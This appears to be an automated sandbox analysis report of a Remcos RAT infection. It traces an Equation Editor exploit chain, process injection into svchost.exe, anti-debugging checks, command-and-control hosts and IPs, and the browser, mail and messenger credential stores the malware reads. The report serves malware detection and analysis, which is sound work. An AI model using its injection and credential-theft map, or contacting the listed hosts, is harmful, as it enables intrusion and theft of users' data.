Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2371

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A6EAA2 BlockInput,

3_2_00A6EAA2

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00A22622

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_009F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_009F42DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0356088E mov edx, dword ptr fs:[00000030h]	2_2_0356088E
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A14CE8 mov eax, dword ptr fs:[00000030h]	3_2_00A14CE8
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00193520 mov eax, dword ptr fs:[00000030h]	3_2_00193520
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00193580 mov eax, dword ptr fs:[00000030h]	3_2_00193580
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00191F00 mov eax, dword ptr fs:[00000030h]	3_2_00191F00
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D64CE8 mov eax, dword ptr fs:[00000030h]	6_2_00D64CE8
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00113520 mov eax, dword ptr fs:[00000030h]	6_2_00113520
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00113580 mov eax, dword ptr fs:[00000030h]	6_2_00113580
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00111F00 mov eax, dword ptr fs:[00000030h]	6_2_00111F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004432B5 mov eax, dword ptr fs:[00000030h]	7_2_004432B5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h]	7_2_10004AB4

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

3_2_00A50B62

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A109D5 SetUnhandledExceptionFilter,	3_2_00A109D5
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00A22622
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00A1083F
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A10C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00A10C21
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D609D5 SetUnhandledExceptionFilter,	6_2_00D609D5
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00D72622
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D6083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00D6083F
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D60C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00D60C21
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00434B47 SetUnhandledExceptionFilter,	7_2_00434B47
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_004349F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0043BB22
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00434FDC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_100060E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_10002639
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.94.53.100 2766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yuahdgbceja.sytes.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

7_2_004180EF

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008			Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

7_2_004120F7

Source: C:\Users\user\AppData\Roaming\CKK.exe

3_2_00A51201

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A32BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

3_2_00A32BA5

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A5B226 SendInput,keybd_event,

3_2_00A5B226

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

3_2_00A722DA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Process created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Roaming\CKK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\CKK.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\CKK.exe

3_2_00A50B62

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A51663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

3_2_00A51663

Source: CKK.exe, 00000003.00000000.458425358.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, CKK.exe, 00000003.00000003.795866045.0000000002CB1000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000006.00000002.800878386.0000000000E02000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: CKK.exe, deblaterate.exe	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A10698 cpuid

3_2_00A10698

Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	7_2_00452036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_004520C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	7_2_00452313
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	7_2_00448404
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_0045243C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	7_2_00452543
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_00452610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoA,	7_2_0040F8D1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	7_2_004488ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: IsValidCodePage,GetLocaleInfoW,	7_2_00451CD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	7_2_00451F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	7_2_00451F9B

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A2333F GetSystemTimeAsFileTime,

3_2_00A2333F

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A4D27A GetUserNameW,

3_2_00A4D27A

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A2B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

3_2_00A2B952

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_009F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_009F42DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\svchost.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

7_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\svchost.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		7_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: \key3.db		7_2_0040BB30

Searches for Windows Mail specific files

Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1592, type: MEMORYSTR

Source: deblaterate.exe	Binary or memory string: WIN_81
Source: deblaterate.exe	Binary or memory string: WIN_XP
Source: deblaterate.exe.3.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: deblaterate.exe	Binary or memory string: WIN_XPe
Source: deblaterate.exe	Binary or memory string: WIN_VISTA
Source: deblaterate.exe	Binary or memory string: WIN_7
Source: deblaterate.exe	Binary or memory string: WIN_8

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\svchost.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS			Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
